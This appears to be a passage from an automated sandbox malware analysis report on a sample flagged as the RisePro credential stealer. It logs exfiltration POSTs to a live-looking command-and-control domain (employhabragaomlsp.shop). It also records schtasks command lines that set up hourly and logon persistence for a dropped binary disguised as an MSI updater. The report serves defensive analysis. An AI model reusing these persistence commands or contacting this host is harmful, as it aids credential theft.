2024-05-23 22:22:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49755	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:29 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5429 Host: employhabragaomlsp.shop
2024-05-23 22:22:29 UTC	5429	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:30 UTC	824	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t0oekdpv1t0uvnv669ga3a4oiq; expires=Mon, 16-Sep-2024 16:09:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qga3FGf1zJDN6b017Ccx%2BJulL%2FKFoDQdA1aZpyEjTUALRbSgrmczldOcLJu6zCP%2BeWaTLNH29nVOgfXr%2FGlWGC3YoajqI2kyY8lK3DMNIqWm4ZM%2B%2BUajfX%2Fa2MeZLj7t4Jh5QiLcD%2Ft2%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871ea9de6c35e-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49756	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:31 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1234 Host: employhabragaomlsp.shop
2024-05-23 22:22:31 UTC	1234	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:31 UTC	820	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3r7bjm8dbkum3jdb5oo9caua9c; expires=Mon, 16-Sep-2024 16:09:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYXuGUR8P7qrciXGJs%2F%2FTNOXoPRwYEbp%2Fp25h1z9i4YKYJX78HYXC5HmQ1A1nUr3rRzthrvymUhfYPff%2Fj%2FDkk%2FX7kOxigAZ%2Fn1WC38JA2IWkIkfx9Nr7IZH26twRytDmXlfyzoJ6m4jjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871f4e9e54286-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49757	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:32 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572276 Host: employhabragaomlsp.shop
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: 77 b4 22 d5 56 b8 2f 56 83 cb 31 d7 50 ef 5c 7e 74 c7 77 fa 4f 49 97 d7 0a 1a 91 3e b0 a7 07 a2 7e db 38 1d ab 3c 98 9d 90 a0 b2 b7 9e b5 a8 17 76 3a f2 e1 ec a1 36 4d 08 3d ef f3 4e 05 2a 6f f2 8a 85 5c 50 a2 8b d4 12 04 95 cd e6 2a 15 00 be e2 66 93 f5 e2 a3 c3 93 ea 3c cc 2c 73 e9 97 2a fe 50 7a d9 de f0 ac e7 a2 a9 44 a6 20 82 ba e1 22 fc eb 65 98 23 58 ae be 79 6e f8 67 07 2b e3 15 7d 76 95 17 ec 26 01 aa 67 24 58 e6 5b cc c2 5a e0 b6 ac e7 53 57 d3 e3 6f ca c8 dc eb 4d 6b 67 ad 21 04 ab ae d7 0f be 5c b1 47 50 95 2d fe bf 87 31 7b b1 30 32 18 43 d6 66 4f 03 88 7b d5 6c 3e ec 0a 2c 11 6d 72 f3 2a 66 78 3a 8e 55 61 ae 2e 4b b5 9f 19 ca bb 85 cf 67 68 e7 4d 75 5b 80 7c 1c a6 17 09 f7 fe 76 ea 9b 85 a8 af c7 02 54 33 65 a3 f7 65 d8 96 61 24 db 42 49 fb Data Ascii: w"V/V1P\~twOI>~8<v:6M=No\Pf<,sPzD "e#Xyng+}v&g$X[ZSWoMkg!\GP-1{02CfO{l>,mrfx:Ua.KghMu[\|vT3eea$BI
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: ef 2d e3 e6 34 2d a4 67 7c 67 fc a7 9a 59 50 c4 53 c7 e6 07 80 7b ee 27 ab eb 27 af 81 3e 1a fe f3 98 b7 f2 98 68 7a 8c e6 8e eb af be 7a 5d f4 a3 5e 65 67 27 8c 95 ba cc 10 c5 f1 8c f4 e3 b5 93 c7 24 91 70 10 df d8 95 cb c7 fe 79 16 fa 36 3d d7 b9 c9 fe 22 ca 52 2a 04 dc a7 dc 5f 7e 2c 9d e5 f4 48 0f c7 27 a6 78 88 bb 5b 0c 2e a1 19 86 12 a0 64 b7 c9 9e c0 33 78 7c c2 85 a5 a1 7f e2 45 4f 15 45 ee 2f 48 f2 80 e1 4a dd 17 e5 2b 82 3f 06 fa 73 eb f5 87 7e 58 0b d2 8b 23 a5 85 85 67 2b 5d 43 4d 78 45 df a3 09 4f 9b e0 86 e2 b1 66 9c d2 b8 3d 08 fc a0 c1 97 f0 8e 10 11 f6 c2 50 49 81 61 d6 19 e5 45 d5 6d a9 60 e5 1c ff f3 69 17 71 6d a8 c7 fa c4 ec bd 7b 7b 5a 7e f3 48 af 61 1e be bd 76 dd dd e5 86 c5 d7 51 d2 f7 6a b7 17 96 86 0b f7 1d 0a 10 d5 c8 bc 09 70 Data Ascii: -4-g\|gYPS{''>hzz]^eg'$py6="R*_~,H'x[.d3x\|EOE/HJ+?s~X#g+]CMxEOf=PIaEm`iqm{{Z~HavQjp
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: d9 dc c9 b2 fe 20 17 cd ce c4 cf 13 c2 5c b7 2a fb 8b 8b 47 b6 5c 53 c4 53 c4 5f a9 cd 3e 29 66 96 2b ff bb 11 e9 c7 95 e7 e4 d0 18 d6 bf 3a 64 bf 19 74 8c b7 50 6f 79 a0 50 33 87 b1 f6 f5 bb 55 ec 21 3a 0f 35 17 7d ca c1 71 d5 29 fc d0 c6 80 fb 7d c5 7b 9a 8b 4e f2 c9 51 9f 34 5e b6 fc c4 de bc b5 e9 a4 d4 f3 a9 f7 8d 91 3a 3d b8 2f 03 90 eb e0 b5 52 d4 e4 d6 cb 8d 77 63 5a 68 96 c1 6c 27 67 e0 96 ce ba 80 44 5c de 8f 0c 6e 5d f4 27 45 e3 47 70 7d bb bf 83 28 a8 f9 19 dc 77 fa af 3a 0e 7f 86 25 bd 37 5b a4 50 e2 12 3b 7c ad 5d d3 5e 03 18 c1 26 87 85 e3 9e 84 1f 28 5b bc 45 bf c1 07 a0 39 89 03 d6 c4 54 ce 1e 65 d2 c9 b9 45 d5 4d 83 6a 06 f3 c2 88 4c cc 8b a4 d0 a8 51 21 8a d0 89 da 96 15 03 f9 07 8f 62 1a 83 6b 8a b3 fe d2 db 8f f9 8b ef 68 c7 9e 89 d0 Data Ascii: \*G\SS_>)f+:dtPoyP3U!:5}q)}{NQ4^:=/RwcZhl'gD\n]'EGp}(w:%7[P;\|]^&([E9TeEMjLQ!bkh
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: 3b 7e 19 9c 15 2c 3c 79 9e 6e 25 74 4b 2a a7 46 3f 46 2b 26 b1 8a 7e e1 e4 34 f8 e1 0f bd 35 c5 2a 85 c4 22 fe 82 83 cb ff 35 fa 21 a0 f0 2e 7f 61 1e e6 02 06 6c a1 81 81 0f 34 6f 8e 90 65 4e 31 42 a4 5b 55 9f 41 52 3d 5e 2f 7d ab 0e 21 f3 a0 e1 08 8a 7e 74 ee 07 fd 6c 0a a3 21 bc 4f 14 3f f2 d6 d7 58 9f e3 ad d6 55 c1 c1 af e8 1a d8 be f8 dc 31 27 79 55 5c 10 21 f3 f8 a1 89 73 b0 07 be 51 62 28 39 57 08 e1 b2 26 4e 63 59 c0 36 43 7a e9 cc 50 76 31 e0 05 d2 8c 57 62 3c 22 e0 3d fe e8 8b ea ed 95 74 07 aa 89 8c c9 49 fe 72 f0 2c bb e0 32 1a e6 13 50 07 2f 73 6d 26 a0 53 7c d8 b5 27 3f aa 52 47 91 39 d8 bc 58 fc d3 0d 51 7b c6 b1 d4 14 71 bc bf 76 66 05 67 1f 36 b2 44 de 01 ca f4 01 25 5e a2 6f da 84 ee 93 6a 8c 81 21 9d d6 ed 99 f7 a3 89 ab bc ef 65 ad 4d Data Ascii: ;~,<yn%tKF?F+&~45"5!.al4oeN1B[UAR=^/}!~tl!O?XU1'yU\!sQb(9W&NcY6CzPv1Wb<"=tIr,2P/sm&S\|'?RG9XQ{qvfg6D%^oj!eM
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: 78 d5 a0 b5 7f c0 f6 1c bd d4 66 3c 73 63 52 f2 82 b8 be ef 8a ab d7 41 aa d7 ac 92 5c 44 a0 d0 61 52 b3 63 18 79 24 bb d0 66 64 5e 71 bf 68 75 95 e5 d7 4e 63 ff 8b da 93 46 8b ee 5e 3d 0d 46 af 30 d1 a0 b9 88 33 f9 eb 60 9d eb 4d 49 96 88 70 e5 99 24 77 b5 18 d2 8d 51 41 4a 0d 7c 86 f5 20 e2 a6 d8 06 96 dd fa 8b 9e 8c 1d 8f 48 2f 00 63 06 9b fa 72 cd 7a bc ef e5 96 71 81 a7 49 3d 51 21 96 e7 6e 39 ee ba 51 c0 b2 75 cb 30 af 32 de a5 74 8e 26 b9 10 43 4d 65 2e 9f 8c b3 b2 52 ca 50 ee 8b cd 10 13 8b 97 f9 b2 fa b3 3e 87 c9 cb ff 83 74 9e 76 73 16 73 5f 76 52 6f 73 df 39 d6 56 86 d0 27 39 ad 25 f0 24 ae cd 00 3e cb 76 53 65 94 4a 3e 53 48 52 17 e0 ab 09 fb c5 6a f8 47 a4 ca c4 09 57 95 df 4d f0 16 38 e4 cd e9 34 75 4a 94 7a b6 2a 85 a2 ff cb 9c 6b 0d 2c e6 Data Ascii: xf<scRA\DaRcy$fd^qhuNcF^=F03`MIp$wQAJ\| H/crzqI=Q!n9Qu02t&CMe.RP>tvss_vRos9V'9%$>vSeJ>SHRjGWM84uJz*k,
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: 12 39 63 f0 ea 7f 78 c9 d4 9c 62 b4 88 c0 0f 73 7f 94 a6 76 9b 0c fc d5 43 c0 ef 53 6a 20 10 5b fa e5 99 77 67 de 75 35 f5 32 fb d4 99 c1 cc 6b d4 3b 42 15 c0 df 0f dd 7d 9a 6a fe 95 08 7e 97 fb 2e 3d 7a 4c 9d 7d 2b a7 bd 7f 17 11 34 1b 82 b5 7b 32 f0 24 ce 1e 4f 9a f3 d9 d0 92 83 2d 16 37 cd d3 6d 3d b8 3a 7b b3 af 51 23 2b 48 8d ad 67 22 3e 4e 5e de d0 3a 47 8f 86 65 b1 38 b6 c5 86 16 89 7a 82 d5 72 9d d3 d2 9e 79 95 9c b2 21 75 1d 3a 98 10 e5 ee fb 74 db 9c 47 32 31 aa 6a 9b 83 81 9b cf 70 b5 46 b2 5f 93 47 72 e5 19 49 d8 d3 49 7b a4 4c 76 d7 e9 27 48 68 87 e6 07 01 26 6c e4 51 3c 23 00 75 45 06 9f 41 15 20 5c 72 a2 cf 4c 93 c3 df e8 da 39 c1 f3 ba 08 3f 17 b0 83 5e 4a c2 7e b9 12 26 48 39 34 a4 a0 9c 56 ca f5 3b 7c 4f ea c4 b8 87 07 28 fd 47 e4 df 8c Data Ascii: 9cxbsvCSj [wgu52k;B}j~.=zL}+4{2$O-7m=:{Q#+Hg">N^:Ge8zry!u:tG21jpF_GrII{Lv'Hh&lQ<#uEA \rL9?^J~&H94V;\|O(G
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: 3b f9 0e 39 dc c4 55 87 f6 10 5c 14 22 33 fb 2f 03 9b 4a a7 73 7a f9 cc 77 1b ee 41 f8 7d 2e e3 30 7a 16 1a d5 ff 52 ae 0f 04 e3 71 40 1e 78 80 7d 4d 9b 2f d4 9e 24 59 15 9a f2 da 94 ec db 00 90 83 fb df 07 9c 07 39 bc 73 c6 4e 82 64 df 87 a9 68 ed b1 c0 3e bf 1b 1e c3 25 50 85 5e 7e bd 1a 44 2e 9d fb b5 de 97 17 9b 94 6c 8b 0b 40 f7 b7 b9 ac 8f e1 b2 e2 36 da 44 d7 33 79 f3 0b 75 17 75 ef 4a 30 65 80 c3 8a e1 3f 01 9c 28 86 b7 59 33 92 71 e6 c4 d8 13 9e e1 92 45 cb 01 1d b8 2a cb 66 79 d1 57 1f f3 9c f3 80 dd 1d d9 5b 7c 3b 21 82 d2 30 c4 fa 77 0e b7 da 70 c9 75 16 02 0d 2c 98 19 8e 74 ca bc 7d 37 da 4d 7c be 68 77 79 5b 5b 4a f9 5e ee fa c6 1c af 5b ad 8a 13 42 b1 fd 5e a4 cf 90 71 8c 62 dd cb d6 80 40 d4 32 ab c7 4b 38 4d 2c 74 e2 f1 ef bf 7e 25 6a cd Data Ascii: ;9U\"3/JszwA}.0zRq@x}M/$Y9sNdh>%P^~D.l@6D3yuuJ0e?(Y3qE*fyW[\|;!0wpu,t}7M\|hwy[[J^[B^qb@2K8M,t~%j
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: b7 47 71 f5 22 13 91 09 01 ca 8b f2 9b c3 f5 dc 44 1d 06 b1 82 cd 94 44 31 5b 56 ab 7b 2b 79 e3 22 ef 16 dc e2 e3 cc e1 c4 d9 01 ec 2c a4 8a 90 51 3d 72 33 74 1f 59 85 e4 d6 6e eb 29 56 f8 f8 ef bf e9 75 e8 fc af 2e 47 a8 d2 d8 fd b3 af e6 b5 d0 e0 fd b4 39 1f 20 67 1b 70 4f 53 50 88 b5 67 bf c1 95 6d 19 3e f4 40 f4 79 5b cf 39 b6 8e 94 b7 1e 48 b8 4f 4b f3 e3 8a 06 80 cd 3d 0c e6 5a 7d 24 91 41 64 98 68 ae 33 24 7c 49 0a a2 97 02 bb 0c 51 21 15 c6 08 62 3c 2c 84 28 c9 f2 5d b9 e5 7a 84 16 36 5b 14 52 a3 d9 ba a6 86 7d 57 02 ba 57 bd b2 a2 1d 90 e0 69 40 da 1b b7 1a 9b 4e 7f 65 0f 81 4f 7b 4c 5d b7 49 92 b2 eb 4c d0 b1 3f 57 f2 34 eb 94 05 6e f4 a6 b6 db 38 47 af 36 af c3 9e 22 8d d3 0c 79 70 d2 73 75 fb f8 c8 fb 18 d2 14 37 29 c2 fc 3e c6 89 5a 2a e1 e0 Data Ascii: Gq"DD1[V{+y",Q=r3tYn)Vu.G9 gpOSPgm>@y[9HOK=Z}$Adh3$\|IQ!b<,(]z6[R}WWi@NeO{L]IL?W4n8G6"ypsu7)>Z*
2024-05-23 22:22:32 UTC	15331	OUT	Data Raw: bc 5f 98 2a 7c dd ab 39 86 77 83 c0 3d 6d 23 3d 8d 04 df 9c 4f b3 d2 f8 ca 8b da f8 bd 4a c6 9f 3b aa d1 32 50 d2 67 27 0f d8 fc 8e 9c 7c 24 26 32 78 f3 af 79 fe f0 9e 87 f5 09 11 eb 42 56 48 b7 fa 56 c7 d9 6c 98 2d c9 12 46 01 f9 5f a3 f9 37 ac 9d 59 06 47 af b0 44 c0 d3 1d ce bf 92 2f 1e c9 71 16 66 64 da d2 cd 8c 37 f1 6c 71 94 55 95 2b bf ae 53 aa 85 f4 f2 96 b6 91 3d 45 b5 27 14 1f 0a 36 9e 20 3d d4 26 95 6b 54 21 c8 5b f1 b5 fb a3 a7 ba 36 23 74 75 c1 27 d1 63 8f ff fb 98 2c 19 4b e4 29 2b 26 6a 8a 37 28 d2 1b ca 56 8a 96 bf 63 65 e6 3c 2b aa 2f fc f0 0e af 9f c9 5c 60 6f 70 ed 63 3e 19 8c 86 cd b5 94 87 13 bd fe 66 6e 8c 96 b0 83 03 47 7d e7 28 03 16 7f d6 36 b9 4e f9 16 bb 4c 3a 28 ac 6c 2c 3e 41 8c b9 46 c0 c5 1c 4a 78 3d 6e 7e fc 7d 62 01 e7 17 Data Ascii: _*\|9w=m#=OJ;2Pg'\|$&2xyBVHVl-F_7YGD/qfd7lqU+S=E'6 =&kT![6#tu'c,K)+&j7(Vce<+/\`opc>fnG}(6NL:(l,>AFJx=n~}b
2024-05-23 22:22:35 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vvhbd18el45rradqubonstgnlr; expires=Mon, 16-Sep-2024 16:09:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzenUhTPKvjcEvK5rqn9X7XwpkA7LMpMn%2BssJkTXDSMjt9XkriV%2BekYsbwDIDuVJ0CwNlvCJ3AtRZgACdd%2F9o23luJ94hsQrVRB%2BB2Qp6YnbqlzTbLBJJHvV2CHpEOshkOcHK8jQH8u97A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871fefcd718cc-EWR alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	18:21:51
Start date:	23/05/2024
Path:	C:\Users\user\Desktop\tMO4FVIc9l.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tMO4FVIc9l.exe"
Imagebase:	0x820000
File size:	3'134'976 bytes
MD5 hash:	6BC7F3C7927F5FC13A4410F1770C2DFE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:22:01
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0x730000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:22:01
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:22:02
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0x730000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:22:02
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:22:02
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe"
Imagebase:	0x4e0000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:22:02
Start date:	23/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:22:02
Start date:	23/05/2024
Path:	C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
Imagebase:	0xbf0000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:22:02
Start date:	23/05/2024
Path:	C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
Imagebase:	0xbf0000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
